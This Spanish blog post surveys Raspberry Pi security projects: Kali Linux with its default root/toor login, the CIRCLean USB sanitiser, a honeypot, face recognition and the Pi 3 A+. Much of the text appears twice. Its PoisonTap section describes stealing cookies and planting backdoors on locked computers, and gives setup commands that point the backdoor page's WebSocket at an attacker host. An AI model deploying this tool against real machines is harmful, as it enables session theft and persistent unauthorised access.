Tutoriales y Manuales
Entradas Mensuales
-
►
2024
(Total:
1090
)
- ► septiembre (Total: 50 )
-
►
2023
(Total:
710
)
- ► septiembre (Total: 65 )
-
►
2022
(Total:
967
)
- ► septiembre (Total: 72 )
-
►
2021
(Total:
730
)
- ► septiembre (Total: 56 )
-
►
2020
(Total:
212
)
- ► septiembre (Total: 21 )
-
►
2019
(Total:
102
)
- ► septiembre (Total: 14 )
-
▼
2018
(Total:
150
)
-
▼
noviembre
(Total:
21
)
- Incidente de Seguridad en tienda Dell.com
- Servicio de Correos Americano (USPS) expone datos ...
- Alemania quiere regular los routers que usan los u...
- Congreso Español aprueba el cierre de páginas web ...
- 0-day en PHP: borran 6.500 sitios de la Dark Web e...
- Ministro Ciberseguridad Japonés nunca ha usado un ...
- Herramientas y recursos de seguridad en Amazon Web...
- Seguridad informática con Raspberry Pi
- Crean huellas dactilares maestras capaces de engañ...
- Firefox avisa cuando entras a una web que haya sid...
- ISP Nigeriano redirecciona por error tráfico de Go...
- Actualización de seguridad para Plugin WordPress p...
- Bot crea parches en GitHub bajo pseudónimo humano ...
- CAINE 10 - Computer Aided Investigative Environmen...
- Valve recompensa con 20 mil dólares descubridor bu...
- Copia de Seguridad de WhatsApp en Google Drive
- PHP 5 y 7.0 dejarán de tener soporte a finales de año
- Manual JavaScript quiere que aprendas el 80% de to...
- Samsung anuncia su primer smartphone con pantalla ...
- Vulnerabilidades críticas en el cifrado nativo de SSD
- Hackers vinculados a Corea del Norte roban millone...
-
▼
noviembre
(Total:
21
)
-
►
2017
(Total:
231
)
- ► septiembre (Total: 16 )
-
►
2016
(Total:
266
)
- ► septiembre (Total: 38 )
-
►
2015
(Total:
445
)
- ► septiembre (Total: 47 )
-
►
2014
(Total:
185
)
- ► septiembre (Total: 18 )
-
►
2013
(Total:
100
)
- ► septiembre (Total: 3 )
-
►
2011
(Total:
7
)
- ► septiembre (Total: 1 )
Blogroll
Etiquetas
seguridad
(
396
)
privacidad
(
364
)
google
(
355
)
ransomware
(
341
)
vulnerabilidad
(
305
)
Malware
(
265
)
Windows
(
246
)
android
(
244
)
cve
(
237
)
tutorial
(
237
)
manual
(
222
)
software
(
206
)
hardware
(
196
)
linux
(
127
)
twitter
(
117
)
ddos
(
95
)
WhatsApp
(
92
)
Wifi
(
85
)
cifrado
(
77
)
herramientas
(
75
)
hacking
(
73
)
sysadmin
(
68
)
app
(
65
)
Networking
(
57
)
nvidia
(
53
)
ssd
(
51
)
youtube
(
50
)
firmware
(
44
)
adobe
(
43
)
office
(
41
)
hack
(
40
)
firefox
(
36
)
contraseñas
(
32
)
eventos
(
32
)
antivirus
(
31
)
juegos
(
31
)
cms
(
30
)
flash
(
28
)
anonymous
(
27
)
apache
(
26
)
MAC
(
25
)
programación
(
25
)
exploit
(
23
)
multimedia
(
23
)
javascript
(
22
)
Kernel
(
20
)
ssl
(
19
)
SeguridadWireless
(
17
)
documental
(
16
)
Forense
(
15
)
conferencia
(
15
)
Debugger
(
14
)
lizard squad
(
14
)
técnicas hacking
(
13
)
auditoría
(
12
)
delitos
(
11
)
metasploit
(
11
)
Virtualización
(
10
)
adamo
(
9
)
reversing
(
9
)
Rootkit
(
8
)
Ehn-Dev
(
7
)
MAC Adress
(
6
)
antimalware
(
6
)
oclHashcat
(
5
)
Entradas populares
-
Después de ver qué es una vCPU y la diferencia entre núcleos (cores) e hilos en los procesadores, pasamos a explicar toda la nomenclatura d...
-
iperf3 es la última versión del popular programa iperf para medir el ancho de banda entre dos o más equipos en red local o Internet . Es...
-
A finales del mes de agosto hablábamos de que los legisladores estadounidense habían solicitado la investigación de TP-Link . Y así, ya ten...
Seguridad informática con Raspberry Pi
miércoles, 21 de noviembre de 2018
|
Publicado por
el-brujo
|
Editar entrada
Las grandes ventajas de una Raspberry Pi como arquitectura hardware son: su reducido tamaño, su alta
capacidad de proceso en relación a su tamaño y su escaso coste (a parte del bajo consumo). Estas
son las características ideales para usar este hardware para utilidades seguridad informática. Veámos cómo una Raspberry Pi puede ayudarnos a aprender sobre seguridad online y proteger nuestros equipos. En anteriores entradas ya vimos que era posible hacer un completo análisis y auditoría de Redes Wifi con una Raspberry Pi. Otras posibles ideas son la instalación de utilidades de red como Nagios (monitoreo de Red) o Pi-Hole para bloquear y eliminar la publicidad de sitios webs mientras navegamos. O usar la Raspberry Pi como centro multimedia utilizando XBMC, OpenElec o Rasplex.
These images have a default password of “toor” and may have pre-generated SSH host keys.
Para formatear la tarjeta SD podemos usar la herramienta SDFormatter. Después podemos utilizar Win32 Disk Imager, para escribir y convertir la imagen de una tarjeta SD a un pendrive USB. También podemos crear copias de seguridad del sistema operativo (clonar la imagen del SO)
Cuando necesitamos extraer la información de forma segura desde la llave USB sin enchufarla a ninguna computadora que podamos querer usar de nuevo. Necesitas una máquina "airlocked" (sin red) en caso de que intente contarle a alguien con armas de fuego. Una segunda computadora portátil no es práctica, Las máquinas virtuales requieren competencia para usarlas. Las máquinas virtuales exponen la computadora host a todo lo que esté conectado de todos modos.
Una imagen de sistema operativo segura diseñada para hacerlo de forma segura. Transferir con seguridad la información de una memoria USB potencialmente infectada a una memoria USB limpia y confiable sin transmitir malware ni alertar a nadie sobre la transferencia.
El malware con regularidad utiliza memorias USB para infectar a las víctimas, y el abuso de las memorias USB es un vector común de infección (como ejemplo, las llaves USB perdidas tienen un 66% de posibilidades de malware).
CIRCLean es una solución de hardware independiente para limpiar documentos de llaves USB / memorias USB no confiables. El dispositivo convierte automáticamente los documentos que no son de confianza en un formato legible pero desarmado y almacena estos archivos limpios en una llave / dispositivo USB de confianza (propiedad del usuario).
El objetivo de CIRCLean es establecer el intercambio de documentos incluso si no se puede confiar en la capa de transporte utilizada (la memoria USB) o si existe la sospecha de si los documentos contenidos están libres de malware o no. En el peor de los casos, solo se dañaría el CIRCLean, pero no la computadora que lee la llave / dispositivo USB de destino (de confianza).
El código se ejecuta en una Raspberry, lo que también significa que no es necesario conectar la llave USB original a una computadora. CIRCLean puede verse como una especie de espacio de aire entre la llave USB no confiable y su computadora operativa.
CIRCLean no requiere requisitos técnicos de ningún tipo y puede ser utilizado por cualquier persona. CIRCLean es un software gratuito que puede ser auditado y analizado por terceros.
PoisonTap es capaz de emular una conexión Ethernet a través de USB (o Thunderbolt) que funciona de "gateway" para por ejemplo, poder capturar las cookies de las 1.000.000 webs más usadas, crear backdoors, o capturar sesiones, todo esto desde un servidor remoto.
Es capaz de infiltrarse en un equipo informático al tomar el control del puerto USB y emular una conexión Ethernet. Podría secuestrar todo el tráfico de Internet.
Además, PoisonTap es capaz de configurar una puerta trasera en el sistema que permite al ciberdelincuente retener el acceso incluso aunque la Raspberry Pi lleve un tiempo desconectada.
PoisonTap puede infiltrarse en cualquier computadora incluso cuando está bloqueada o protegida por contraseña.
Al tomar el poder del puerto USB, emula una conexión Ethernet a través de USB, antes de secuestrar todo el tráfico de Internet. Como si esto no fuera suficiente, PoisonTap configura una puerta trasera permanente en el sistema que permite al pirata informático retener el acceso mucho después de que la Pi esté desenchufada. Al insertar el código de ataque en un navegador abierto, PoisonTap secuestra más de un millón de sitios web, inserta falsos iframes y roba datos sobre cada solicitud web que el usuario realiza desde ese momento.
Es una pieza de software increíblemente desagradable de la que es difícil protegerse, y no es de extrañar que Samy se vincule a "puerto USB" en la descripción de su video.
Características de la herramienta:
Editar el fichero poisontap/backdoor.html (cambiar la url de la línea var socket = new WebSocket(‘ws://:1337’);)
Un honeypot emula una vulnerabilidad real de programa o red (en un entorno controlado) para atraer un ataque/atacante externo. SNARE (honEypot Reactivo Avanzado de Súper Próxima Generación) y TANNER operan en conjunto para atraer y evaluar posibles intentos de piratería informática.
SNARE se ejecuta en cualquier sistema Linux, lo que lo hace perfecto para la Raspberry Pi. Una vez instalado, ingrese la URL del sitio que desea probar para hacer un clon. La ejecución de SNARE aloja una copia del sitio en la dirección IP de la Raspberry Pi y registra todas las solicitudes realizadas al sitio. TANNER es una herramienta para analizar los eventos, preparar diferentes respuestas y visualizar los datos a través de la GUI web.
Aprender cómo funciona una red y qué vigilar cuando algo va mal, es un paso importante hacia la creación de sistemas seguros.
Este proyecto de Raspberry Pi es capaz de reconocer las caras de los usuarios. Necesita un módulo de cámara. Utiliza OpenCV (Open Source Computer Vision Library)
Otra opción es usar TensorFlow, una librería de reconocimiento de imágnes de Google, con la Raspberry Pi
Es de dominio público que la Fundación Raspberry no tiene intención de lanzar un modelo mucho más potente a largo plazo, así que con la Raspberry Pi 3 B+ ya en el mercado se daba por hecho que antes o después tenía que aparecer un modelo reducido.
La nueva Raspberry Pi 3 A+ es básicamente una versión recortada de la mejorada y ya conocida Raspberry Pi 3 B+, ideal para introducir en carcasas más pequeñas o ajustarla a proyectos donde el tamaño es un aspecto crítico. Sin embargo, retiene la mayor parte del hardware de su predecesor. Esto incluye un procesador ARM Cortex-A53 a 1,4 GHz y la conectividad 802.11ac/Bluetooth 4.2 con BLE.
Por el camino se caen el puerto Ethernet y tres de los puertos USB integrados en el modelo original, ahora reducidos a uno. También se reduce a la mitad la RAM, ofreciendo 512 MB.
No estará disponible hasta el mes de diciembre, pero la Raspberry Pi 3 A+ ya se encuentra a la venta en los distribuidores oficiales de España por unos 28 euros.
Fuentes:
https://www.elotrolado.net/noticia_la-reducida-raspberry-pi-3-a-se-estrena-con-procesador-a-1-4-ghz-y-medidas-mas-compactas_38651
https://www.makeuseof.com/tag/raspberry-pi-learn-online-security/
https://www.redeszone.net/2018/11/18/raspberry-pi-herramientas-seguridad/
- Raspberry Pi 4 con CPU Cortex A72, hasta 4 GB de RAM, doble Micro HDMI y USB-C
Kali Linux en la RaspBerry Pi
La popular distribución orientada a auditorías de seguridad Kali Linux tiene una versión desde hace años, ya que tiene soporte completo para la arquitectura ARM de 64 bits, una arquitectura que es la utilizada por los mini ordenadores más potentes que han ido apareciendo:These images have a default password of “toor” and may have pre-generated SSH host keys.
username: root
password: toor
kali > startx
Para formatear la tarjeta SD podemos usar la herramienta SDFormatter. Después podemos utilizar Win32 Disk Imager, para escribir y convertir la imagen de una tarjeta SD a un pendrive USB. También podemos crear copias de seguridad del sistema operativo (clonar la imagen del SO)
Analizar memorias USB con CIRCleaner
Cuando necesitamos extraer la información de forma segura desde la llave USB sin enchufarla a ninguna computadora que podamos querer usar de nuevo. Necesitas una máquina "airlocked" (sin red) en caso de que intente contarle a alguien con armas de fuego. Una segunda computadora portátil no es práctica, Las máquinas virtuales requieren competencia para usarlas. Las máquinas virtuales exponen la computadora host a todo lo que esté conectado de todos modos.
Una imagen de sistema operativo segura diseñada para hacerlo de forma segura. Transferir con seguridad la información de una memoria USB potencialmente infectada a una memoria USB limpia y confiable sin transmitir malware ni alertar a nadie sobre la transferencia.
El malware con regularidad utiliza memorias USB para infectar a las víctimas, y el abuso de las memorias USB es un vector común de infección (como ejemplo, las llaves USB perdidas tienen un 66% de posibilidades de malware).
CIRCLean es una solución de hardware independiente para limpiar documentos de llaves USB / memorias USB no confiables. El dispositivo convierte automáticamente los documentos que no son de confianza en un formato legible pero desarmado y almacena estos archivos limpios en una llave / dispositivo USB de confianza (propiedad del usuario).
El objetivo de CIRCLean es establecer el intercambio de documentos incluso si no se puede confiar en la capa de transporte utilizada (la memoria USB) o si existe la sospecha de si los documentos contenidos están libres de malware o no. En el peor de los casos, solo se dañaría el CIRCLean, pero no la computadora que lee la llave / dispositivo USB de destino (de confianza).
El código se ejecuta en una Raspberry, lo que también significa que no es necesario conectar la llave USB original a una computadora. CIRCLean puede verse como una especie de espacio de aire entre la llave USB no confiable y su computadora operativa.
CIRCLean no requiere requisitos técnicos de ningún tipo y puede ser utilizado por cualquier persona. CIRCLean es un software gratuito que puede ser auditado y analizado por terceros.
PosionTap
PoisonTap es un gadget creado hace unos 2 años por el investigador de seguridad, Samy Kamkar, utilizando una RaspBerry Pi Zero y software Node.jsPoisonTap es capaz de emular una conexión Ethernet a través de USB (o Thunderbolt) que funciona de "gateway" para por ejemplo, poder capturar las cookies de las 1.000.000 webs más usadas, crear backdoors, o capturar sesiones, todo esto desde un servidor remoto.
Es capaz de infiltrarse en un equipo informático al tomar el control del puerto USB y emular una conexión Ethernet. Podría secuestrar todo el tráfico de Internet.
Además, PoisonTap es capaz de configurar una puerta trasera en el sistema que permite al ciberdelincuente retener el acceso incluso aunque la Raspberry Pi lleve un tiempo desconectada.
PoisonTap puede infiltrarse en cualquier computadora incluso cuando está bloqueada o protegida por contraseña.
Al tomar el poder del puerto USB, emula una conexión Ethernet a través de USB, antes de secuestrar todo el tráfico de Internet. Como si esto no fuera suficiente, PoisonTap configura una puerta trasera permanente en el sistema que permite al pirata informático retener el acceso mucho después de que la Pi esté desenchufada. Al insertar el código de ataque en un navegador abierto, PoisonTap secuestra más de un millón de sitios web, inserta falsos iframes y roba datos sobre cada solicitud web que el usuario realiza desde ese momento.
Es una pieza de software increíblemente desagradable de la que es difícil protegerse, y no es de extrañar que Samy se vincule a "puerto USB" en la descripción de su video.
Características de la herramienta:
- Mediante la conexión USB, es capaz de emular una conexión Ethernet, ya mencionada anteriormente.
- Captura todo el trafico de internet que tenga la maquina atacada.
- Captura y almacena todas las cookies HTTP de 1.000.000 de sitios web.
- Expone el enrutador interno, lo que da la posibilidad al atacante de conectarse remotamente.
- Instala backdoors persistentes en el cache HTTP para multitud de dominios, todo esto con acceso a las cookies del usuario mediante el envenenamiento de cache (cache poisoning).
- Permite al atacante realizar peticiones HTTP remotamente con las cookies del usuario víctima en cualquier dominio con backdoor.
- No requiere que la maquina esté desbloqueada.
- Los backdoors y el acceso remoto persiste, incluso si el dispositivo de removido de la máquina víctima
$ sudo apt-get install nodejs $ git clone https://github.com/samyk/poisontap $ cd poisontap $ sudo node backend_server.js &
Editar el fichero poisontap/backdoor.html (cambiar la url de la línea var socket = new WebSocket(‘ws://:1337’);)
var socket = new WebSocket('ws://host:1337');
HoneyPot SNARE-TANNER
Un honeypot emula una vulnerabilidad real de programa o red (en un entorno controlado) para atraer un ataque/atacante externo. SNARE (honEypot Reactivo Avanzado de Súper Próxima Generación) y TANNER operan en conjunto para atraer y evaluar posibles intentos de piratería informática.
SNARE se ejecuta en cualquier sistema Linux, lo que lo hace perfecto para la Raspberry Pi. Una vez instalado, ingrese la URL del sitio que desea probar para hacer un clon. La ejecución de SNARE aloja una copia del sitio en la dirección IP de la Raspberry Pi y registra todas las solicitudes realizadas al sitio. TANNER es una herramienta para analizar los eventos, preparar diferentes respuestas y visualizar los datos a través de la GUI web.
Aprender cómo funciona una red y qué vigilar cuando algo va mal, es un paso importante hacia la creación de sistemas seguros.
Reconocimiento facial a través con OpenCV
Este proyecto de Raspberry Pi es capaz de reconocer las caras de los usuarios. Necesita un módulo de cámara. Utiliza OpenCV (Open Source Computer Vision Library)
Otra opción es usar TensorFlow, una librería de reconocimiento de imágnes de Google, con la Raspberry Pi
Nueva Raspberry Pi 3 A+
Una versión más pequeña de la Pi 3.Es de dominio público que la Fundación Raspberry no tiene intención de lanzar un modelo mucho más potente a largo plazo, así que con la Raspberry Pi 3 B+ ya en el mercado se daba por hecho que antes o después tenía que aparecer un modelo reducido.
La nueva Raspberry Pi 3 A+ es básicamente una versión recortada de la mejorada y ya conocida Raspberry Pi 3 B+, ideal para introducir en carcasas más pequeñas o ajustarla a proyectos donde el tamaño es un aspecto crítico. Sin embargo, retiene la mayor parte del hardware de su predecesor. Esto incluye un procesador ARM Cortex-A53 a 1,4 GHz y la conectividad 802.11ac/Bluetooth 4.2 con BLE.
Por el camino se caen el puerto Ethernet y tres de los puertos USB integrados en el modelo original, ahora reducidos a uno. También se reduce a la mitad la RAM, ofreciendo 512 MB.
- A 1.4GHz 64-bit quad-core ARM Cortex-A53 CPU
- 512MB LPDDR2 SDRAM
- Dual-band 802.11ac wireless LAN and Bluetooth 4.2/BLE
- Improved USB mass-storage booting
- Improved thermal management
No estará disponible hasta el mes de diciembre, pero la Raspberry Pi 3 A+ ya se encuentra a la venta en los distribuidores oficiales de España por unos 28 euros.
Fuentes:
https://www.elotrolado.net/noticia_la-reducida-raspberry-pi-3-a-se-estrena-con-procesador-a-1-4-ghz-y-medidas-mas-compactas_38651
https://www.makeuseof.com/tag/raspberry-pi-learn-online-security/
https://www.redeszone.net/2018/11/18/raspberry-pi-herramientas-seguridad/
Enviar por correo electrónico
Escribe un blog
Compartir en X
Compartir con Facebook
Compartir en Pinterest
0 comentarios :
Publicar un comentario
Los comentarios pueden ser revisados en cualquier momento por los moderadores.
Serán publicados aquellos que cumplan las siguientes condiciones:
- Comentario acorde al contenido del post.
- Prohibido mensajes de tipo SPAM.
- Evite incluir links innecesarios en su comentario.
- Contenidos ofensivos, amenazas e insultos no serán permitidos.
Debe saber que los comentarios de los lectores no reflejan necesariamente la opinión del STAFF.